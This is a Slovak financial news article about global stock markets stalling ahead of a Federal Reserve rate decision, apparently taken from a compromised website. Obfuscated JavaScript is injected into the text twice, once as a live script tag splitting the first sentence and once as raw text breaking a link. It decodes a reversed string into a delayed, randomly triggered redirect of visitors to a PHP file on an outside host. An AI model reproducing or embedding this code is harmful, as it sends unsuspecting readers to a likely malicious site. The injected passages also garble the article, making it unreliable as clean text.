Zatiaľ čo ázijské akcie zaznamenali počas stredajšieho obcho<script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>dovania mierne zisky, Európa a Spojené štáty boli na pokraji stagnácie.

Svetové akciové trhy na hojdačke, nervozita pred zasadnutím Fedu rastie

Zatiaľ čo ázijské akcie zaznamenali počas stredajšieho obchodovania mierne zisky, Európa a Spojené štáty boli na pokraji stagnácie. Medzi investormi jednoznačne rastie nervozita z nadchádzajúceho menovopolitického zasadnutia americkej centrálnej banky.

Slabé vyhliadky

Už na budúci týždeň rozhodne americký $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dolar-nadalej-posilnuje-investori-veria-ze-fed-v-buducom-roku-zvysi-sadzby-na-pat-percent/“ target=“_blank“ rel=“noopener“ title=““>Fed o ďalšom pohybe úrokových sadzieb a takmer nikto nepochybuje o tom, že pôjde o pohyb smerom nahor. Jediná diskusia, úvahy alebo špekulácie sa týkajú toho, ako intenzívny bude ďalší „výlet“. A existuje prakticky všeobecná zhoda, že Fed opäť zvýši svoje sadzby o 0,75 percentuálneho bodu.

Žiadne veľké pohyby

Táto nervozita sa prejavila na akciových trhoch prakticky na celom svete. Ázijské burzy mierne vzrástli, ale skôr len vymazali straty zaznamenané v predchádzajúcich dňoch. Európske trhy skončili mierne v červených číslach, hoci sa vyskytli aj výnimky, ako napríklad Madrid. Spojené štáty sa vybrali viac-menej podobným smerom ako Európa.

Akcie by tak z letargie mohlo vytrhnúť len také menovopolitické rozhodnutie Fedu, ktoré by spôsobilo pozitívne prekvapenie. To znamená, že sadzby by sa zvýšili menej, než sa teraz všeobecne očakáva.

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *